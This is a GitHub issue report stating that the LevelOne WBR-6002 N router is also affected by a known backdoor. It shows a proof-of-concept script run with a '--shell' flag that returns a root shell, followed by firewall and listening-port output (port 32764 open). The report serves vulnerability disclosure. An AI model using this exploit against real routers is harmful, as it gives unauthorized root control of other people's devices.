Skip to content

LevelOne WBR-6002 N is affected too, but not listed in README.md #107

New issue
New issue
Open
Open
LevelOne WBR-6002 N is affected too, but not listed in README.md#107
@azazar

Description

@azazar
azazar
opened on Jul 16, 2016

Backdoor is working and listening on the internet on LevelOne WBR-6002 N .

$ ./poc.py  --ip=192.168.0.1 --shell
welcome, here is a root shell, have fun

iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 *:49152                 *:*                     LISTEN      
tcp        0      0 *:80                    *:*                     LISTEN      
tcp        0      0 *:32764                 *:*                     LISTEN      
udp        0      0 localhost.localdom:3073 *:*                                 
udp        0      0 *:23460                 *:*                                 
udp        0      0 *:1900                  *:*                                 
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node Path

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions